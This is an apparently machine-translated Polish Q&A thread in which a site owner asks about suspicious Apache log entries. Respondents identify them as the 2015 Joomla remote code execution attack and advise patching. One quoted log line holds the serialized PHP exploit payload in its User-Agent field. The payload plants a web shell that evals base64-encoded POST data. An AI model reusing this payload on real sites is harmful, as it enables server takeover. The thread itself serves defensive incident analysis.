Czy identyfikacja użytkownika użytkownika była używana w technice ataku skryptowego?

Wpisy dziennika dostępu Apache w mojej witrynie są zwykle takie:

207.46.13.174 - - [31 października 2016: 10: 18: 55 +0100] „GET / contact HTTP / 1.1” 200 256 ”-„ ”Mozilla / 5.0 (kompatybilny; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

dzięki czemu można zobaczyć tam pole użytkownika użytkownika. Ale dzisiaj znalazłem również pole użytkownika-klienta używane w ten sposób:

62.210.162.42 - - [31 października 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: „SimplePie”: 5: {s: 8: „sanitize”; O: 20: „JDatabaseDriverMysql”: 0: {} s: 8: „feed_url”; s: 242: „file_put_contents ($ _ SERVER [„ DOCUMENT_ROOT ” ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

Czy to był atak? Wygląda na to, że następny wpis dziennika został pomyślnie pobrany (kod 200) z pliku sqlconfigbak.phpwymienionego w skrypcie. Chociaż nie mogę znaleźć pliku w systemie plików:

62.210.162.42 - - [31 października 2016: 11: 24: 20 +0100] „GET //sqlconfigbak.php HTTP / 1.1” 200 399 ”http://www.googlebot.com/bot.html„ ”Mozilla /5.0 (kompatybilny; Googlebot / 2.1; + http: //www.google.com/bot.html) „0.244 BYPASS 10.10.36.125:104 0.244

Proszę, co się tutaj działo?

To jest Joomla 0 Day Attack. Informacje znalezione tutaj: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

To nie jest test wrażliwości pomimo testu __. To jest atak.

Upewnij się, że każda instalacja Joomla jest jak najbardziej aktualna.

Inną opcją jest po prostu użycie .htaccess do przechwycenia tego exploita przez poszukiwanie wspólnego ciągu, „__test” zadziała i przekieruje do innego miejsca.

Adres IP, który podłączyłeś, nie rozpoznaje nazwy hosta Google, dlatego nie jest to Google. Osoba lub bot skanuje witrynę w poszukiwaniu luk. Pierwszy próbuje znaleźć lukę w Joomla.

Te zdarzenia występują regularnie w większości witryn. Powinieneś upewnić się, że postępujesz zgodnie z najlepszymi praktykami i wzmocnić swoją witrynę, proces jest długi i musisz znaleźć samouczek online i postępować zgodnie z nim.

Oprócz innych odpowiedzi zauważ, że fakt, że ten atak najwyraźniej zadziałał, sugeruje, że używasz starej, niepewnej wersji PHP. Poprawka błędu, który wykorzystuje ten atak, została wydana we wrześniu 2015 r. Uruchom proces aktualizacji i upewnij się, że pobiera najnowszą wersję PHP. Sprawdź także inne nieaktualne programy, które również korzystają z Internetu, ponieważ wydaje się, że Twój serwer nie był aktualizowany przez co najmniej rok.